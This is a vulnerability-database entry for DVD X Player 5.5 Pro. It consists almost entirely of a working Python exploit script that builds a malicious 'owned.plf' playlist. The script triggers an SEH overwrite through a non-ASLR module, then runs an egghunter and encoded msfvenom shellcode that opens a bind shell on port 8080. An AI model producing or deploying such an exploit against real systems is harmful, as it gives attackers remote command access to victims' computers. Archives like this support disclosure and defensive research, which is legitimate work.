DVD X Player 5.5 Pro SEH Overwrite

2014-07-01T00:00:00
ID SSV:72067
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                # DVD X Player 5.5 Pro
# Bypass ASLR by using non-aslr enabled module
# SEH Overwrite
# Egghunter is not needed as there is at least 2000 bytes for shellcode


import sys

print "===================================="
print "DVD X Player 5.5 Pro Buffer Overflow"
print "    SEH Overwrite - Bypass ASLR     "
print "         Written by Blake           "
print "===================================="

# size = 325 bytes
# ./msfvenom -p windows/shell/bind_tcp LPORT=8080 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x1a' -f c
shellcode=(
"\xba\x16\x44\x8a\xd1\xdb\xd1\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x4b\x31\x55\x14\x83\xc5\x04\x03\x55\x10\xf4\xb1\x76\x39\x71"
"\x39\x87\xba\xe1\xb3\x62\x8b\x33\xa7\xe7\xbe\x83\xa3\xaa\x32"
"\x68\xe1\x5e\xc0\x1c\x2e\x50\x61\xaa\x08\x5f\x72\x1b\x95\x33"
"\xb0\x3a\x69\x4e\xe5\x9c\x50\x81\xf8\xdd\x95\xfc\xf3\x8f\x4e"
"\x8a\xa6\x3f\xfa\xce\x7a\x3e\x2c\x45\xc2\x38\x49\x9a\xb7\xf2"
"\x50\xcb\x68\x89\x1b\xf3\x03\xd5\xbb\x02\xc7\x06\x87\x4d\x6c"
"\xfc\x73\x4c\xa4\xcd\x7c\x7e\x88\x81\x42\x4e\x05\xd8\x83\x69"
"\xf6\xaf\xff\x89\x8b\xb7\x3b\xf3\x57\x32\xde\x53\x13\xe4\x3a"
"\x65\xf0\x72\xc8\x69\xbd\xf1\x96\x6d\x40\xd6\xac\x8a\xc9\xd9"
"\x62\x1b\x89\xfd\xa6\x47\x49\x9c\xff\x2d\x3c\xa1\xe0\x8a\xe1"
"\x07\x6a\x38\xf5\x31\x31\x55\x3a\x0f\xca\xa5\x54\x18\xb9\x97"
"\xfb\xb2\x55\x94\x74\x1c\xa1\xdb\xae\xd8\x3d\x22\x51\x18\x17"
"\xe1\x05\x48\x0f\xc0\x25\x03\xcf\xed\xf3\x83\x9f\x41\xac\x63"
"\x70\x22\x1c\x0b\x9a\xad\x43\x2b\xa5\x67\xec\x9a\x81\xdb\x7b"
"\xde\x35\xc3\xeb\x57\xd3\x91\x1b\x31\x4b\x0e\xde\x66\x44\xa9"
"\x21\x4d\xf8\x62\xb6\xda\x16\xb4\xb9\xdb\x3c\x96\x16\x74\xd7"
"\x6d\x75\x41\xc6\x71\x50\xe2\x9f\xe6\x2e\x62\xed\x97\x2f\xaf"
"\x87\x57\xba\x4b\x0e\x0f\x52\x51\x77\x67\xfd\xaa\x52\xf3\x34"
"\x3e\x1d\x6c\x39\xae\x9d\x6c\x6f\xa4\x9d\x04\xd7\x9c\xcd\x31"
"\x18\x09\x62\xea\x8d\xb1\xd3\x5e\x05\xd9\xd9\xb9\x61\x46\x21"
"\xec\x73\xbb\xf4\xc9\xf1\xcd\x72\x3a\x3a")

# 32 byte egghunter
egghunter =(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"
"\x54\x30\x30\x57" # egg - W00T
"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")


# overwrite EIP = 260 bytes
# overwrite SEH = 616 bytes - 0x61602adb pop edi; pop esi; ret [EPG.dll]

egg = "\x54\x30\x30\x57\x54\x30\x30\x57"
buffer = "\x41" * 608
next_seh = "\xeb\x06\x90\x90"	# jump forward 6 bytes
seh = "\xdb\x2a\x60\x61"	# pop/pop/ret
nops = "\x90" * 20

print "[+] Creating malicious plf"
try:
	file = open("owned.plf","w")
	file.write(buffer + next_seh + seh + nops + egghunter + nops + egg + shellcode)
	file.close()
	print "[+] File created successfully"
	raw_input("[+] Press any key to exit")
except:
	print "[X] Error creating file!"
	sys.exit(0)